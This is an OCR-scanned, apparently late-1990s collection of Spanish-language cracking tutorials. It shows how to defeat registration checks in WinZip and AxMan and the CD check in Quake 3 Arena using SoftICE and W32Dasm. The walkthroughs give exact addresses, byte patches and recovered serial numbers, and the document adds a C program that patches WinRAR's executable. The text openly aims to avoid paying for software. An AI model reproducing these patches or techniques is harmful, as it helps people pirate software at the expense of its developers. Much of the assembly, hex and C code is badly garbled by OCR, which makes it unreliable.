camp byte per [0048070], 00 
pop «ox 

pop ecx 

ya 00400005 

cap byte par 10044CD44], 00 
Ye 00400005 

call 00407105 

cast e.ax, enr 


100407FBC 7447 je 00400005 
0040751 £? push edi 
* orrible Prringbata dat frou Data 0b3 -*"BinTip* 


:004071BF BFAAITA7OO 


a 4 A A 


' 
mov edi, 0047FIA 


Line 16703 Pg 33 and 338 al 50 Fl WirepT ex 


Con que ese es el cabron.... 


Y no hay de otra si t bajas un poco mas de eso solo encuentras una llamada a borrar y 


después encontramos 


“Incomplete or incorrect information” 


y después una llamada a finalizar... tons yo creo que es 


GetDlgltemTextA 


Y si no me equivoco ... en esa parte donde dice “winzip32.ini” es el nombre de la sub 
carpeta que guarda en el registro cuando nos registramos.. =8-P 


Por que lo registre y anduve buscando el registro como winzip32.ini .. y la neta no encontré 
nada..no se en si aparte del registro donde guarda la info del 4d serie y nombre... 


Si si hay formas más sencillas de encontrar la llamada ...pero la cosa es que aprendan... 


Bueno lo que queremos es agarrar cuando comprueba el +d serie x que el nombre la neta 


nos vale 


.. y Queremos anticiparnos a que salga esa pantallita diciéndote que no t hagas guey..que ese 


F no es valido.. =8-D 


Ook ponemos los datos nuevamente.. no presionamos 00k..ahora abrimos Soft Ice y 


colocamos un bpx a 


Bpx GetDlgltemTextA 


Presionamos FS para salir de Ice ahora si le damos Ook ... salta Ice ahora presionamos F5 
.. por que ahorita lo que hizo fue revisar el nombre .. vuelve a salir Soft Ice y ahora 
presionamos F11 para saber donde hicieron esa llamada...y caemos AQUI.. 


(52 URSoft W32Dasm Ver 8.93 Program Disassembler/Debugger ll ES 
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:00407FSE 53 push ebx 


LA 


* Reference To: USER32.CetDlgltemTextaA, Ord:0104h 
| 


:00407F8F FF1528744700 Call diword ptr [00477428] 
:00407F96 ESFF?S80300 call 0043F89A 

:00407F9B 56 push esi 

:00407F9C ES22790300 call 0043F8C3 

:00407FA1 SO3D7?8CD480000 cmp byte ptr [0048CD78], 00 
:00407FA8 59 pop ecx 

:D00407FA9 59 pop ecx 

:00407FAA 7459 je 00408005 

:00407?FAC SO3DAICDASOO0O camp byte ptr [0048CDA44], 00 
:00407FB3 7450 je 00408005 

:00407FB5 ESIBFAFFFF call 004079D5 

:00407FBA 85C0 test eax, eax 

:00407FEC 7447 je 00408005 


:00407FBE 57 push edi 


A A 


Line:16706 Pg 335 of 5502 Code Data (2:00407F95 (AOffset DODOZFI5h in File*W'inzip32. exe 


(Claro en ventana de Soft Ice) 
es explicar ahí que pex.. pues bueno si comprendí bien.. 
La llamada 00407FA1 donde dice 
Cmp byte ptr [0048CD78], 00 <>Verifica si es un + d Serie Vacio 
La llamada 00407FAA donde dice 
Je 00408005 <> Compara y si no es igual salta a error 
La llamada 00407FAC donde dice 
Cmp byte ptr [0048CDA4], 00 <> Verifica si es un Nombre vació 
La llamada 00407FB3 donde dice 
Je 00408005 <> Compara y si no es igual salta a error 
La llamada 00407FBS donde dice 
Call 004079D5 <> Rutina que genera un + de serie correcto 


La llamada 00407FBA donde dice 
test eax, eax € > Compara el + d serie que metimos con uno valido 
La llamada 00407FBC donde dice 
je 00408005 <> Compara y si no es igual salta a error 


Nota: En Soft Ice los saltos “je” aparecen como “jz” pero es lo mismo uno u otro 


Bueno yo se que los saltos se ven tentadores..pero naaa ..pasaría lo mismo que nos paso con 
WinRar.. cualquier + d serie lo aceptaría.. pero saldría la misma cuando vuelva a cargar 
otra vez seria de evaluación... la que nos interesa es la rutina donde se genera el de serie 
en pocas palabras nos tenemos que fijar en 
004079D5 
le vamos a poner un break point a esa dirección pero primero borramos el bpx que ya 
teníamos...ya saben tecleamos bc * 

y sin salirte de Ice tecleamos un bpx a la dirección donde se generan los + d serie 
que es.. 


bpx 004079D5 


Bien ahora salimos de Soft Ice con F5 y tecleamos ook 
y salta de nuevo Soft Ice le volvemos a dar F5 y ahora si nos muestra el mensaje de error... 
ahora si le volvemos a dar 00k para registrarnos y de nuevo salta Soft Ice ... ahora caemos 
aquí.. 
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:004079D1 5D pop ebp al 
:004079D2 C20400 ret 0004 
pa 


” Deferenced by a CALL ar Addreszes: 
1:0040108B , 00401221 , :004041E8 , +00407FBS ,» :00433D12 
| 


:004079D6 SBEC mov ebp, esp 

:004079D3 81EC08020000 sub esp, 00000208 

:004079DE 53 push ebx 

:004079DF 56 push esi 

:004079E0 33F6 xor esí, esi 

:004079E2 803D78CD480000 cap byte pur [0048CD?8], 00 
:004079E9 57 push edi 

:004079EA 0F849A000000 3e 00407A48A 

:004079F0 2£D45EC lea eax, dword ptr [ebp-14) 
:004079F3 50 push «ax 


| Line:15955 Pg 319 and 320 of 5502 Code Data (200407305 COffset DODO79D5h n Fle.Winzip32.exe 


(Claro ya saben en ventana de Soft Ice) 


Bueno pues aquí ya valió ma... ahora vamos a atener que ir traceando el código con F10... 
recuerdan que en el curso pasado les comente las ventanas que mostraba Soft Ice ahorita la 
que nos interesa es la de registros donde aparece EAX,EDI,EBX,EBP ..etc..etc... y tienen un 
signo de igual y después números... (si no la ves presiona F2 estando en Ice) si t fijas 
presiona F10 y veras que la barra se va desplazando hacia abajo..y que donde están los 
registros unos se ponen en color verde ya se EAX,EDI..o cualquier otro...bien ahora lo que 
nos interesa es ver lo que esta en memoria de EAX ...lo que quiero decir es que vamos a 
revisar solo los que se pongan en verde donde dice EAX en la ventana de registros .. 
avanzando con F10 tienes que revisar solo los que “enciendan” EAX a verde. 
y los revisas tecleando 


d eax 
y el resultado t lo va a mostrar en la ventana que parece código de UltraEdit... del lado 
derecho... no t muevas muy rápido y dale tiempo a que muestre el resultado..x que t puedes 
pasar.. 


Espero haberme explicado bien ... bueno pues uno x uno los tienen que ir traceando ... a mi 
en la dirección 
00407A16 


me apareció el nombre al que lo quiero registrar que en mi caso es Mr.Serial CoDe9x 
Y mi el numero de serie valido me apareció pasando 
004XXXXX 
XXXXXXXX con un EAX=XXXXXXXX 


por si no me entendiste bien donde sale el resultado sale algo x el estilo.. 


018F: 0079F2E8 39 41 38 33 32 39 30 43 — 00 01 00 00 00 00 6£ E3 9A83290C...... n.. 
018F: 0079F2F8 01 00 02 00 0B 00 EA 82 — 4F 99 42 00 7E 16 AS 0A........ O. Boo 


Donde esta el + es mi numero de serie valido si se fijan fue fácil de encontrar x que no son 
puros números si no tambien incluye letras ... si tienen X la dirección donde estaba el + es 
para que trabajen =8-D ..y no obtengan el * de serie valido tan fácil... 


Bien lo copio mi F de serie valido quito todos los break points y salgo de Soft ice ...y 
introduzco mi nombre de nuevo y mi * de serie 


lf you paid the WinZip registration fee: 


A 
ot an authorzed reseller, please enter pour name and registration number here 
EXACTLY as they appear in the instructions, or chck "Help" for additional information. 


lf you have not yet paid the WinZip registration fee: 


lf you downloaded an evaluation version of WinZip, or if you recemed this version ob WinZip 

on a disk or CD, weh a book, or with other hardware or software, A 

pinto renga E are licensed to use WinZip for evaluation purposes only. Chick 
Continue Unregistered”. os or chick "Help" for additional information. 


Name: [mr Serial CoDe9x 
Begistration tt [34832300 


[A cl NE 
Y esta vez... me da las gracias por mi “compra” =8-D 


Registration Information 


Mr. Serial CoDe9x 
94,83290C 


Press OK to confirm that this is pour correct registration information and 
that you have obtained it from WinZip Computing, Inc. or an authorized 
reseller. Otherwise press Retry or Cancel. 


Bueno espero que no tengan ninguna bronca para registrar el programa y para sacar el 
serial valido si no ya saben mi email... espero haberme explicado bien... si hace falta algo x 
saber solo díganmelo.. si sintieron que esta muy avanzado aun para uds tambien escribanme 

..y le bajamos.. no hay pex..a mí en lo particular este crackeo se me hace para 
principiantes..pero no todos tenemos la misma opinión.. 
=8-P .. Bueno Mr. Silver de WkT; creo que sip... jajajaj que mamon soy.. nsc... Bueno =8- 
O ....Maldita sea otra vez el Soft Ice me atraso el reloj de la pc ='( voy a llegar mega tarde a 
la uni para inscribirme.. =8-/ ..luego x que se enoja mi papa... jajajaj nos vemos... 


Crackeando Winzip 7.0 € 8.0 € 8.1 


Protección por claves ; herramientas softice y hexedit 
presentación 


M. Alcázar Creo estar de acuerdo con que Nico Mak tiene potencial suficiente para hacer una protección fuerte 
y sin embargo ésta no aparece. En un ensayo que a este momento aún espera ver la luz, eidan yoson menciona 
que Microsoft mira hacia otro lado cuando de protección se trata y tampoco podemos suponer falta de recursos. 
Y casualmente, eidan compara Excel con Winzip como dos protecciones sorprendentemente débiles aunque los 
productores tengan distintos motivos para no reforzarlas. WinZip es quizás el mejor programa (o al menos el 
más difundido) para el manejo de archivos comprimidos. El programa en si es una obra de arte por lo 
"amigable" (si algún programa es en realidad amigable con los seres humanos), compacto, intuitivo y práctico. 
Es una pena crackearlo porque sus autores merecen la escasa suma de dinero (U$D29) que reclaman a cambio de 
su registración. Es más, no está limitado en el tiempo de prueba, y es totalmente operativo. La desventaja de 
no registrarse es la aparición de una pantalla de advertencia al inicio del programa en donde se invita a 
registrarse. Y no perdamos de vista al irritante botón de aceptar cambiando de posición en cada arranque. 
Bien, manos a la obra.Comenzamos por lo ya acostumbrado. un BPX MessageBoxA (es 32 bits) y otro BPX 
.GetDlglItemTextA. El que dio resultado es este último. Ponemos en la pantalla de registro un nombre y S/N 
cualquiera y clickeamos sobre el botón OK llegamos al primero de los BPX, que corresponde a la obtencion del 
nombre de usuario. Siguiendo un poco el programa de a pasos (T) averiguamos la direccion en donde se almacena 
(en nuestro caso 0047D928). Despues de un G, llegamos al segundo BPX, en donde averiguamos que la dirección 
en donde se almacena el S/N es (en nuestro caso)protecciones en winzip 7.0 0047D958. Establecemos ahora dos 
BPR para esas direcciones origen y + LEN como final (LEN es la longitud del nombre de usuario en un caso y la 
del S/N ingresado en el otro).Es hora de practicar el zen cracking, pero en lugar del Martini-Vodka de +0RC, 
los sudakas usamos una sesion de un termo de mate. Como consejo, no use otra yerba que la Rosamonte paquete 
rojo :-). Y sólo un "toque" de peperina. Mate y termo en mano, sigamos con nuestro WinZip 7.0: En varias 
oportunidades se mueven los string ingresados o se les calcula la longitud. Algo más adelante, llegamos a la 
subrutinade comparación, que es como sigue: 


00457900: .... ¿INICIO 
00457918: BO FF MOV AL,FF 
8B CO MOV EAX,EAX 
0045791C: LOOP 
DA CO OR AL,AL 
74 2E INZ 0045794E ¡RETORNO 
BA 06 MOV AL,[ESI] ¡COMPARAR [ESI] 
46 INC ESI 
8A 47 MOV AH,[EDI] ¿CON [EDI] 
47 INC EDI 
38 C4 CMP AH,AL ¡AQUI 
74 F2 IZ LOOP 
2C 41 SUB AL,41 
MAS CODIGO 


0045794E: RETORNO 
MOVSX EAX,AL ¡RESULTADO EN EAX 
MUCHOS POPS 
LEAVE 
RET 


Este procedimiento es llamado en 9 ocasiones desde que se pulsa el botón OK hasta que aparece el fatídico 


cartelito de ERROR en s/N. Buen truco, pero insuficiente y demasiado directo para desalentar a un cracker decidido. Las interesantes son las 
primeras cuatro veces (en particular, en la cuarta se decide el destino del usuario como buen Este procedimiento es llamado en 9 ocasiones desde que se 
pulsa el botón OK hasta que aparece el fatídico cartelito de ERROR en S/N. Buen truco, pero insuficiente y demasiado directo para desalentar a un cracker 
decidido. Las interesantes son las primeras cuatro veces (en particular, en la cuarta se decide el destino del usuario como buen protecciones en winzip 
7.0 pagador o aprovechador del sistema shareware). 


Las restantes ocasiones se comparan strings como "WinIni" con "WinIni", "WinIni" con "rrs", etc y no tienen significado para nuestro propósito. Por lo 
que se observa, debemos concentrarnos en el cuarto llamado. Los llamados no se producen dentro de un lazo sino a lo largo del programa, consecutivamente. 
El cuarto llamado es como sigue: 


56 PUSH — ESI 

50 PUSH — EAX 

E8A7FC0400 CALL 00457900 ¡COMPARACION ! 

F7 D8 NEG EAX 

1B CO SBB EAX,EAX ¿cómo está la flag Carry_ 
59 POP ECX ; Descarga Stack 

40 INC EAX ¡BANDIDO ! 

59 POP ECX ¡Descarga Stack 
A37CB04700 MOV [0047BO7C],EAX  ¡FLAGDEOK !!!! 

7569 INZ 00407CA6 ¡Salida para comparador 


De modo que cuando queda EAX en 1, uno es un honesto comprador de shareware, si queda en cero es un insensible aprovechador. Notemos sin embargo que esto 
queda bien oculto, ya que la señal que importa a la vuelta del CALL de comparación es la flag de carry. Si el carry esta en 1, la operación SBB EAX,EAX 
da como resultado OFFFF, y al incrementar EAX, queda en 0. Si en cambio el carry vuelve en 0, EAX queda en 1 después del incremento.Bien, modifiquemos 
solo un byte para seguir con la filosofía de ECCE de cambiar lo menos posible 


sustituimos 1BC0 SBB— EAX, EAX 
por 33 CU XOR — EAXEAX 


Para hacer las cosas más sencillas, no hay empaquetado ni encriptado (lo cual hubiese sido fácil para los maestros de Nico Mak). Este es uno de esos 
programas de los que uno piensa que no les interesa al tenedor de la propiedad intelectual contar con una buena protección, por lo que habrá que pensar 
cuál es su estrategia para que las personas compren su programa en lugar de tenerlo gratis.Nótese que hubiésemos podido usar el programa "registrado" 
desde mucho antes: Cuando nos deteníamos a ver el contenido de los punteros almacenados en ESI y EDI, en la cuarta pasada por el procedimiento de 
comparación tenemos accesible el valor de S/N que corresponde al nombre de usuario que elegimos. Por ejemplo: 


para "eidan yoson" corresponde 3CC41656 
para "1" corresponde 00990000 


Pero nuestro objetivo es poder poner cualquier numero como S/N y que WinZip lo admita. (En particular, nuestra indevelable fecha de nacimiento). Y de 
paso, hacer un cracking limpio, usable por cualquier individuo del planeta. Un crack de un par de mates y un byte. 


COMENTARIO FINAL 


Para ser honesto, creo que esa obra de arte que es WinZip merece una mejor protección. No creo que en Nico Mak sean tan ingenuos como para pensar que con 
la relación precio-utilidad baste, y por cierto les acredito suficiente capacidad como para hacerle la vida imposible a cualquier cracker. Por eso no 
puedo coincidir con Caped Crusader que en su larguísimo ensayo publicado en el sitio de fravia+ nos mostró lo práctico que es perder horas haciendo un 
crack en C, cuando cambiando un par de bits logramos demostrar la ligereza de la protección en cuestión de minutos. Para Caped Crusader los autores de 
WinZip son idiotas. Para mi, son tan sutiles que no alcanzo a comprender su actitud. 


¿Cómo crackear el WinZip? 


Es bastante sencillo. Este fue mi primer CraCk y no lo logre solo, lo logro primero mi 
amigote BacH que luego me guió a mí. Yo llegue por mi cuenta pero no lo hubiera logrado 
sin su ayuda, así que GRACIAS BacH! Otra persona a la que debo dar crédito es a 
KarlitoxZ que con sus expedientes crackee unos programas y me di cuenta de que no era 
difícil; y por supuesto al Dios del CRACK +OrC que me ilumino en esta vida cibernética de 
ignorancia. Hoy en día esta la versión 7 del WinZip, la que yo crackee fue la 6.3 que es igual 
que la nueva, solo que la nueva tiene la posibilidad de usar un serial logrado con el 6.3 y otro 
nuevo con un formato distinto.Tratare de explicarles este sencillo CraCk usando el 6.3 
porque tiene menos vueltas, pero luego intenta con el 7.0 que exactamente 1gual o instala el 7 
sobre el anterior y todavía seguirá registrado :-). 

Para comenzar necesitamos el WinZip instalado, su copia de seguridad y el Soft-Ice. Si 
no sabes lo que es el Soft-Ice lo único que puedo decirte es que busques información 
acerca de lo siguiente: ASSEMBLER, INGENIERIA INVERSA, DESENSAMBLADOR, 
DEBUGGER y consigas los manuales del Soft-Ice que se pueden bajar gratis desde 
NuMega y es lo mejor que puedes hacer (nos solo debes bajarlos, sino que DEBES 
LEERLOS).Con el Soft-Ice cargado y corriendo ejecutamos el WinZip y nos aparece una 
pantalla diciendo que les paguemos (si claro...jajaja) para que esta ventana no aparezca mas, 
y podemos ver que el botón que dice Agree va cambiando de posición para que uno no se 
acostumbre de memoria a hacer clic en determinado lugar de la pantalla; también vemos que 
la hot key cambia de posición y que nunca esta seleccionado como default para que con tocar 
enter Agreemos a lo que dice (a propósito: nunca lo he leído!).Esta pantalla es muy fastidiosa 
cuando uno esta acostumbrado a manejarse con zips todo el tiempo, pero no es solo ese el 
problema, el programa que hace los Self-Extract o zips autodescomprimibles le agrega al exe 
generado una pantalla que advierte que ese self-extract ha sido generado con una versión no 
registrada del WinZip.Ahora que ya tenemos un motivo para molestarnos en reventar el 
programa dado que no podemos o no queremos pagarlo por algún motivo moral que no 
quiero discutir, vamos a dedicarnos a joderlo! Bien, ahora hay que ver como sacar esta 
pantalla de aquí y como hacer que el self-extract no tenga esa ventana, para esto 
PODRIAMOS: 

a) Trazar el programa hasta el momento en que presenta la pantalla y ponerle un RET dentro 
del CALL o NOPearlo para que la pase de largo ya sea en el WinZip.exe como en cada uno 
de los SELF-Extract que hagamos :-( 

b) En caso de no estar dentro de un CALL podríamos buscar una comparación al principio 
del programa que se fije si esta o no registrado y el JNE por un JE o algo así :-( 

C) Desensamblarlo en código muerto con el DASM y buscar a través de las Strings 


References :-( 
d) Desensamblarlo al vuelo y obtener un numero de registro valido:-) 


Motivos por el cual no lo haremos del modo a: 

A) No es una forma muy inteligente de hacerlo (además de que es muy difícil y yo no pude) 
y eso de andar patcheando cada self-extract es engorroso. 

b) El o los programadores del WinZip no son tan tontos como quisiéramos, si se mandaron 
algo tan practico y que se presta a ser usado tanto como el WinZip no harían algo lamer, y 
de hecho no lo hicieron. 

C) Perseguir Strings References es MUY molesto dado que tiene MILES y de las miles 40 
interesantes pero ninguna que realmente ayude dado que las que queremos no están aquí. 

d) Oh, sí! esto es lo mejor. Este es el método más aceptable dado que al obtener un numero 
de serie ya nos olvidamos por completo de modificar el ejecutable y del self-extract. 
Primero que nada consíguete unas hojas de papel y un lápiz, porque para no olvidarse nada 
lo mejor es anotarlo y más cuando se trata de direcciones o números en Hexa.Seguimos 
observando al programa y vemos que para registrarnos podemos usar esta nag screen O 
podemos ir a About -> Register WinZip; donde aparece una pantalla que pide un nombre y 
un serial. Lo que DEBEMOS lograr pueden ser dos cosas: o que frene en el momento en que 
genera nuestro serial, para lo cual debemos perseguir al NOMBRE, o que frene cuando 
compara el serial valido con el que pusimos nosotros. Lo más sencillo es parar en la 
comparación dado que esto nos da también la posibilidad de patchear el programa mas tarde 
para que la comparación de bien aunque sea cualquier serial y porque para hacer la 
comparación deberá apuntar directamente al serial nuestro y al valido. Ahora escribimos un 
nombre, yo uso el mío, +6iBa y luego un serial cualquiera como por ej. 12121212. Tocamos 
Ctrl+D para pasar al Soft-Ice. Ahora podemos hacer un break en hmemcpy o buscar en la 
memoria nuestro numero de la suerte, los comandos serian: 

para el break en hmemcpy: BPX hMemCpy 

para buscar el numero: >S 0 | FFFFFFFF '12121212' o sino >S CS:IP | FFFFFFEF 
"12121212! 

Si usamos el BPX presionamos Ctrl+D y seguimos, si usamos la búsqueda haremos lo 
siguiente: 

BPR direccion de respuesta direccion de respuesta+8 RW 

esto hace que el programa pare en el momento en que lea o escriba sobre los caracteres a los 
cuales les pusimos el break. 

Presionamos Ctrl+D 


Seguimos: 

Presionamos en el botón de aceptar y el Soft-Ice salta. 

s1 usamos el bpx hmemcpy tocamos FS hasta llegar a un REPZ MOVSD lo cual copia desde 
EST nuestra clave mágica a ES:DI, que es dentro de una variable del programa. 


Si usamos el bpr ya estamos en el REPZ MOVSD así que continuamos. 

Agregamos un BPR ES:DI ES:DI + 8 RW para que pare cuando lea nuestro serial desde la 
variable del programa para algo que puede ser, tal vez, la comparación deseada. 

Mandamos un G para que siga el programa y salta una vez, después de observar, aquí vemos 
que cuenta los caracteres que tiene nuestro serial, que es interesante mas no importante. 
Mandamos otro G y aparecemos en un lugar con lo siguiente: 


00457A1C OR AL,AL 
00457A1E JZ 0045794E 
00457A20 MOV AL, [ESI] -->en la dirección ESI esta el serial verdadero y 
pone la primer 

letra en el byte low de EAX, AL 
00457A22 INC ESI -->le suma 1 a ESTI para apuntar a la próxima letra, 
que será 

comprobada si la primera es valida. 
00457A23 MOV AH, [ADI]  -->en la dirección EDI esta el serial nuestro y pone la 
primera letra 

en el byte high de EAX: AH. 


00457A25 INC EDI -->le suma 1 a EDI para apuntar a la próxima letra. 
00457A26 CMP AL,AH --> COMPARA EL SERIAL VERDADERO CON EL 
NUESTRO 

00457A28 JZ 00457A1C -->s1 es valido continua. 


Esto es lo que queríamos: esto toma un carácter en ESI y lo pone en AL y luego toma uno en 
EDI y lo pone en AH; entonces los compara y si alguno difiere se va a donde dice que es 
incorrecto. 

SI, es aquí. Si vemos lo que hay en EDI con un memory dump ( D EDI ) vemos que esta 
nuestro 12121212 y si miramos en ESI (D ESI) vemos algo espectacularmente bello, que en 
mi caso con mi nombre es :C98C0363. 

¡Huitaa!, esto parece un serial y lo esta comparando con el mío. Ajammmm... YEAH! lo 
copiamos en nuestro cerebro (o mejor en un papel) y deshabilitamos todos los breakpoints 
con BC *. 

Nos hechamos otro go con G y nos aparece la pantalla de error, aceptamos y volvemos a 
poner los datos con el nombre exactamente igual al anterior y con el numero que tenemos. 


¿Es necesario que te diga lo que sucedió? 


Bueno, te acabas de registrar manito! No mas pantallas al inicio, no mas self-extracts 
delatores ni naa. 


En realidad este es un CraCk muy sencillo y es muy raro encontrar este tipo de comparación 


tan obvia en otro lado, pero siempre son muy parecidas. 

No seas tan lamer de utilizar mi nombre y numero de Serial porque en ese caso eres más 
tonto de lo tu mismo crees y no mereces este archivo. 

Espero que mis pobres conocimientos te sirvan para algo y entiendas los pasos y el 
funcionamiento de este CraCk. 


CRACKEANDO MAS DE 100 continuación ANEXO A 
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| Protecciones Estupidas 


| Programa Axman v3.01 | W95 / WNT 
| Descripción Compresor 


Have you ever downloaded a program that you wanted to make a 
backup copy of only to realize that it was too large to fit onto a single 
floppy disk? Have you ever tried to email someone a large program 
only to have it not get there because of restrications that certain email 
servers make on the size of emails? Have you ever wanted to distibute 
files from your internet site but they are so large that people get 
frustrated trying to download them, having their connections lost and 
being forced to start over? 


If you answered yes to any of the questions above, then AxMan is the 
program for you! 


AxMan is a 32-bit windows application that will split any file into 
pieces. These pieces can then be later restored to recover the original 
file. 


e RR 
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| Herramientas — [Softlce v4.01, W32dasm v8.9, UltraEdit v6.20b. 
| Objetivo — [Simular estar registrados,Encontrar el zerial 
rar REGADO 
Fea [17 de tube de 19 


Introduccion: 


He particionado este ¿¿tutorial??? en tres partes. 


*Primera Parte <con parche> 
*Segunda Parte<en ejecucion o sin parche> 
*Tercera Parte<Encontrando el Zeriall>(recomendado) 


¡Al Atake: 


Primera Parte 

Hacemos todo el proceso de desensamblado y luego buscamos en el string 
reference. Vemos unos cuantos interesantes(expired,invalid info,etc) .Las maneras 
de crackearlo son son practicamente infinitas,pero le daremos al ''thank you 
for...'',doble click y alla vamos: 


:00406AAC 84C0 test al, al 
:00406A AE 6430 push 00000030 
:00406ABO0 7513 jne 00406AC5 


Possible StringData Ref from Data Obj ->'"AxMan - Error 400" 
:00406AB2 688C084600 push 0046088C 
Possible StringData Ref from Data Obj ->"'Invalid Registration Information'' 


:00406AB7 6868084600 push 00460868 
:00406ABC SB CE mov ecx, esi 
:00406ABE E8E67F0200 call 0042EAA9 
:00406AC3 EB7A jmp 00406B3F 


Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
:00406ABO0(C) 


Possible StringData Ref from Data Obj ->''AxMan" 
:00406AC5 686C034600 push 0046036C 


Possible StringData Ref from Data Obj ->'"Thank you for registering your 
copy of AxMan" 


:00406ACA 6838084600 push 00460838---------- > AQUI APARECEMOS. 
:00406ACF 8BCE mov ecx, esi 

:00406AD1 ESD37E0200 call 0042 EAA9 

:00406AD6 ESB8A70200 call 00431293 


Un poco mas arriba esta el "invalid info", o sea que tenemos las dos caras de la 
moneda practicamente juntos, todavia un poco mas arriba un jne, doble click sobre el 
,Jump to y nos lleva al ''thank you...'' o sea q' en la linea :00406AB0 7513 jne 
00406ACS5, cambiar el 7513 por eb13 y el programa is cracked.Facil verdad. 


Segunda Parte(softice) 


Si eso te parecio muy facil o por si alguna obscura razon no tienes el w32dasm,aca 

va otra opcion igual de facil. 

En el programa, Help/Register....ponemos lo que se nos ocurra, bpx 
getdlgitemtexta,x,no pasa nada,probamos otro,bpx getwindowtextA,x, y ahora si, 
estamos adentro,F10 maniaticamente hata que nos salte la ventana "Invalid Info", 

le damosok y estamos de vuelta en el soft nos vamos pa arriba hasta encontrar el jnz 
00406ac5,creo que no hace falta decir que hacer en esta situacion, o si??, 
simplemente poner un bc * y despues doble click en la linea del jnz que mencionamos 
hace un rato(pa poner un bpx).Correr de nuevo el programa y nos para, vemos que 
¡al lado dice no jump; ponemos r fl z y listo. 


Tercera Parte 


Pero todavia hay mas, tambien podemos conseguir el verdadero serial.Repetimos el 
proceso de ariba,pero en vez de poner el bpx en jnz lo ponemos en call que esta un 
poco mas arriba en 00406a47 una vez alli FS para entrar en el llamado, 11 veces F10 
y tnemos Lea eax [esp+08],F10 una vez mas,ahora D eax y vemos 309-621-810.Si 

eso no es un serial q' me parta un rayo jeje... 

PD:El serial es valido para el nombre=danz, Company=my self, si introduces otros 
datos tendras un serial diferente. 

Saludos. 

FEELFREE-KOLGADO 


Karpoff Spanis 
Tutorial Descargado de Luto! 


Hinclude <stdio.h> 


frdefine EXEfile "WinRARO9S5.exe" /* this is the exe file to patch */ 

*define off1 0x1C27F /* this is the first hex location */ 

fdefine progver "WinRAR9S 2.04" /* this is the name of the program you are 
cracking */ 


int crackit(long int location, FILE *tocrack) 


( 


unsigned char x[2]; /* the number in [] is how many bytes to patch */ 


fseek(tocrack,location, SEEK_SET); 

x[0] = 0x90; /* starts with O, not 1 */ 

x[1] = 0x90; /* ends with number of bytes - 1 */ 
fwrite(x,1,2,tocrack); 


return 0; 
) 
void throwbanner() 
( 
printiCnina"); 
print£(" Jos crackinin",progver); 
print£(" byininin”); 


printf" + V VINMIn PPPPPPP V'” VO000000 PPPPPPPw”); 
printf" + V V IP PV VO OP Pn'); 
printi(" +++4++++ V V  I PPPPPPP V V O  OPPPPPPPi”); 


print" + vv. I P VvV O 0OPmn”); 
print" + Vo TIM P V 0000000 Pininn”); 
) 
void waitforenter() 
( 
char wait[1024]; 
printf("WnPress enter to continuein”); 
gets(wait); 
) 


void anylastnotes() 
( 
* any last things you want to print out for the crack, like special 
instructions 
y 
printfInNow start up WinRARO9S.exe, choose 1"Options", then YRegistration""); 
printf("InEnter whatever you want for your name and reg number and now youln”); 
printf("are regged.inin"); 
) 


int main()[ 
FILE *partl; 


throwbanner(); 
partl = fopen(EXEfile, "r+"); 


1f (partl == NULL) 

( 
print£("%s could not be opened! Are you running this crack in the samein",EXEfile); 
printf("directory as %s, and are you sure %s isn't already 1n",EXEfile,EXEfile); 
printf("loaded into memory An”); 
waitforenter(); 
exit(1); 

) 

crackit(off 1 ,partl); 

felose(partl ); 

printf(nPatch sucessfull! nin"); 

waltforenter(); 

anylastnotes(); 

waltforenter(); 

return 0; 


How to crack Quake 3 Arena por +gr00vy 


Lo primero que pense es, si no me aparecen ninguna nag box diciendome que 
ponga el CD, y lo que me aparece es una imagen que me die eso, me conviene 
buscar la API Kernel32.GetDriveTypeA (que es la que se encarga de ver si el CD 
esta o no. 

Bueno una ves que vi las 3 referencias que habia a esa API, me quede con la 
tercera y fui viendo que pasaba. 


Esta es la rutina de comprovacion del Quake 3 Arena 


* Referenced by a CALL at Address: 


| :004A2AAB LE Noopee esta Call pero no pasaba nada... investigue el 
codigo pero no servia nada!!! Parecia imposible!!! 
:004A2B6A 55 push ebp 
:004A2B6B 8BEC mov ebp, esp 
:004A2B6D 8B4508 mov eax, dword ptr [ebp+08] 
:004A2B70 85C0 test eax, eax 
:004A2B72 7424 je 004A2B98 <--—-—-Inverti para que saltara la 
proteccion y 
nada 
:004A2B74 80650B00 and byte ptr [ebp+0B], 00 
:004A2B78 0440 add al, 40 
:004A2B7A 884508 mov byte ptr [ebp+08]1, al 
:004A2B7D 8D4508 lea eax, dword ptr [ebp+08] 
:004A2B80 50 push eax 
:004A2B81 C645093A mov [ebp+09], 3A 
:004A2B85 C6450A5C mov [ebp+0A], 5€ 
* Reference To: KERNEL32.GetDriveTypeA, Ord:0104h <-----=-==========- ACA 
APARECEMOS 
| 
:004A2B89 FF159CF04A00 Call dword ptr [004AFO9C] 
:004A2B8F 85C0 test eax, eax <-—---=-=--- Inverti este saltos 
y nada 
:004A2B91 740A je 004A2B9D <------- Todo esto es como para 
que te pierdas! 
:004A2B93 83F801 cmp eax, 00000001 <--------=- Testea si esta oO 
no 
:004A2B96 7405 je 004A2B9D <-----=-=-=- Inverti este saltos y 
nada 


Bueno como vi que todo eso era inutil casi me rindo, pero en una de esas 
escucho la musica de Rocky Eye Of The Tiger y me lo imagina a rocky peleando 
con el ruso y dije !Yo puedoj 


No se por que pero viendo el codigo rapidamente, vi una String que decia: 


* Referenced by a CALL at Address: 
| :004374FE 


:00432460 83EC54 sub esp, 00000054 


* Possible StringData Ref from Data Obj ->"fs_restrict" 


:00432463 6834364B00 push 004B3634 


:00432468 E823CEFEFF call 0041F290 

:0043246D D81DF0F34A00 fcomp dword ptr [004AF3FO0] 

:00432473 83C404 add esp, 00000004 

:00432476 DFEO fÍstsw ax 

:00432478 F6C440 test ah, 40 

:0043247B 7418 je 00432495 

:0043247D E8BE2E0100 call 00445340 

:00432482 85C0 test eax, eax 

:00432484 740F je 00432495 <---=-=-=-=-=- Esta linea si se 


ejecuta va a saltar el 
codigo siguiente y va a seguir con la 
ejecucion del programa 


* Possible StringData Ref from Data Obj ->"Game CD not in drive" <--—-—-Esta 
String 
| 
:00432486 68A4BE4B00 push 004BBEA4 
:0043248B 6403 push 00000003 
:0043248D ESFE9EFEFF call 0041C390 <------ Call que llama al 
mensaje malo! 
:00432492 83C408 add esp, 00000008 


Aa cda uhmmm sospechoso! 


uhhmmm que hacemos tonces? Si nosotros vemos que si se ejecuta 


:00432482 85C0 test eax, eax 

:00432484 740F je 00432495 

salta la proteccion y se va para abajo, pero.... test eax, eax no va a ser 
igual.... tonces cambiamos 00432484 740F je 00432495 por 00432484 “750F jne 


00432495 y listo!!! 
Juego Crackeado!!! 


Bueno espero que le haya gustado y que si dudan en algo me lo pregunten a 
